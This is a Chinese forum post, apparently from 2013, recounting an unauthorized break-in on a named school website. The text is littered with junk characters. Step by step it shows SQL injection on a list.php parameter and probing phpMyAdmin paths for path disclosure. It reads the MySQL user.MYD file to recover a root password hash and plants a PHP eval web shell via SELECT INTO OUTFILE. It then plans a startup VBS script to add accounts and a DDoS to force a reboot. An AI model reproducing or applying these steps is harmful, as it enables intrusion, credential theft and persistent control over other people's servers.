第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏% s" t7 I; J% J/ j$ h
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
) M. @, N* ^6 E8 H# u$ r' f
' J; r: B! M6 Z2 T- O5 B4 n. W! d+ S" @) ~6 Y
8 D8 {# g7 A6 K
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : t2 X3 ^& J5 j
- w1 G/ C; J+ N6 _9 ?
那么想可以直接写入shell ,getshell有几个条件:" ~+ E& \8 k8 n6 `$ G
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF % c- B. L0 E/ J I" r! c% S5 u
$ t! c% ~/ X- t: N试着爆绝对路径:
G1 f3 O$ Y. T5 z6 N1./phpMyAdmin/index.php?lang[]=1 ! @' R2 ^- |, X4 A1 F' q
2./phpMyAdmin/phpinfo.php 0 V: J" \; J5 t ]4 R7 r" x
3./load_file()
% ~1 F* q+ W; W% I( H+ |1 ^$ q6 w; O0 @4./phpmyadmin/themes/darkblue_orange/layout.inc.php
* j8 J. I& U: Y. A4 V9 I5./phpmyadmin/libraries/select_lang.lib.php
5 f0 W# d* s' E: b: L$ n9 g6./phpmyadmin/libraries/lect_lang.lib.php 6 F- a; E: a5 q/ n5 G7 [
7./phpmyadmin/libraries/mcrypt.lib.php
# F# s N$ `9 X9 X$ c' m. L8./phpmyadmin/libraries/export/xls.php
4 c/ Q# A, H% a( W z; [9 c
; k% U& e6 w3 E- _$ ]5 Z2 E均不行........................... 3 z4 j, }8 @3 f2 v5 k- W6 E
0 Z; S5 I3 P$ B8 E+ N) K御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
" W1 j( ?; j. ?) P8 U! a
8 c! R! q6 `) u; ^- G( d' p, w& l权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
t* |" V1 ?, u. e' ]
. `: k* B( ]' ?7 T. D0 E" ?默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 / D' T2 I# T; T7 L. M! m) Y
: R0 ?( ~# I9 g' }/ }9 p+ ~敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
) h8 ~1 {0 J- k) J8 y" B: ^4 L& \0 y- ~
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 2 T& O7 D4 H# u; H F; V
O! F5 n. m+ c' x1 m* W- Z' Z
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
m# j2 N5 U7 D$ H8 U t- g
" v% Y0 s/ w( Y* H自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD * R* G( H% O, |: K
5 V! W/ \2 I1 g+ S$ @- t: V
成功读到root密码:
% n i) M5 D) g! H" `
" t% i+ Y/ _/ D( V; ]. F1 o17---- r(0072) ! S; F4 q% v9 B( b( `: K! z
18---- o(006f) ; g, g- F/ _" I
19---- o(006f) # b2 |0 {) ^9 e' ~; B8 p( T
20---- t(0074)
. |9 M W% \ p, q0 V21---- *(002a) * ^- _- Z' ~7 i6 b4 I1 q5 Q2 W
22---- 8(0038)
! _1 J: P; H4 {. v23---- 2(0032)
- H s4 V! F4 D0 r( f24---- E(0045) 1 J, z3 K2 a' ]2 j: H e, p
25---- 1(0031)
( C7 ~& e R- f' q V- ^' ~, C26---- C(0043) ' W6 n8 \, h/ F( ~" \1 `! }
27---- 5(0035) ! f6 T5 L" M) ?4 O8 x1 @3 U1 k) l
28---- 8(0038)
2 ]% k5 G9 t1 z0 ?- F: n29---- 2(0032) + ~0 O+ Q- B" X. A
30---- 8(0038) 0 @. g" i9 U7 ^9 W# L* W: B
31---- A(0041)
2 }+ k6 n0 m: X3 k( L* X; @. k32---- 9(0039)
; ^ |( W5 Y$ c. v' ~1 C/ v, d33---- B(0042)
! u9 k/ v4 b% V( o& o2 V, f34---- 5(0035) - X2 H6 R. J$ ~
35---- 4(0034) 8 ?( n7 ?( K! o: `* x
36---- 8(0038) 3 ~ I4 q! @0 P: Y4 ]; |! G
37---- 6(0036) 3 d- V3 K7 W- D7 M' z# q8 F
38---- 4(0034) ) A# w1 A4 B" H
39---- 9(0039) ! O4 [" u2 n r3 o+ D6 D" E0 }
40---- 1(0031)
2 Q2 F- O$ p1 c: F9 B. ?5 e, _# Z: b# F41---- 1(0031) & w* r9 v5 B8 {. v" e
42---- 5(0035) 1 L6 @0 C$ A7 Y4 L; ~9 {' i5 E/ m
43---- 3(0033) 7 y y5 _( Y1 [7 D
44---- 5(0035) * ?& l2 l$ M5 q4 U- s3 {& x: c
45---- 9(0039)
) m! b( Q) `2 C! u6 q) `46---- 8(0038) . D1 d( I* ^! t: K; H
47---- F(0046)
8 A6 y- H8 P9 [+ r7 N48---- F(0046)
8 Z r" S; {4 p& ~49---- 4(0034) 4 a. ?. u* H* o& J# k j
50---- F(0046)
- c2 q( r3 L3 ?9 A1 B51---- 0(0030)
( I4 q$ t4 h5 v52---- 3(0033) ! Q! S1 @6 N+ L- u2 ?0 o
53---- 2(0032) & E4 i8 N- i' c: z. n% p
54---- A(0041) 4 C4 y N$ E% _% A& \% M
55---- 4(0034) % l' o, P# v f) F* U
56---- A(0041)
: l! {% t- U4 A# r57---- B(0042) 3 `: E0 G) R: f+ W# U# O! w
58---- *(0044)
; A8 n! y* L8 k( R, u, O) m5 `59---- *(0035)
6 X# i" h* O+ k1 v$ Z O60---- *(0041) ! s$ o6 I4 E& x. L3 W3 O
61---- *0032)
/ ^( L) z) w5 U/ q5 w2 a
/ Q d3 O S6 J! x% j1 b解密后成功登陆phpmyamin
2 P( |8 S: c* ?# G! H) i+ d |! \ J U$ p* ^- Y: a! ~- a
+ u, P2 R: R8 V$ h. U2 d, A
: j$ {. p7 F. i7 G) y N9 v7 N0 E
/ v$ U( z, K- N+ F找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 3 }9 }( n) D$ l
( x* e1 C, e- M2 ?# Y+ h3 p1 K
成功执行,拿下shell,菜刀连接: * [4 n4 W$ e# t9 v1 ]
L) A8 T3 U' R' l服务器不支持asp,aspx,php提权无果................... + i9 F3 u3 e- I4 P
9 H; q/ u8 T/ y1 [" X2 ]' i
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ! f! R, I8 n7 P% j0 N
服务器上已经有个隐藏帐号了
) H) x+ K, n! e# w7 H4 i- c: f别名 administrators
4 R- g! x# q9 n+ _) W, Z6 _4 O5 q注释 管理员对计算机/域有不受限制的完全访问权 8 O' ?" e2 l2 c1 ~
成员
) R7 |. o7 u% ~" j+ [2 e8 n-------------------------------------------------------------------------------
( t4 v. |) k2 p* }3 Aadmin% S8 j" C; ^% N0 T' q: U
Administrator& X9 y. s$ w" X5 {$ C
slipper$
, m# h y# u7 }# Usqluser2 |! I4 N. z* u0 f" }2 w
命令成功完成。
7 n2 d6 s! _/ u4 X1 \! R
2 j/ z8 Y8 R2 D. E1 t+ g$ R2 ]服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
; U: `+ g4 p6 i7 K# c: N- Q
, i$ A2 C+ A* e" A" J, u* z0 g- Fddos服务器重启,不然就只能坐等服务器重启了...............................
" \7 w3 F* |( P- z) b( C; t0 k! s F, P' A1 C" n4 Z
0 @ t. w" b& W9 O
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
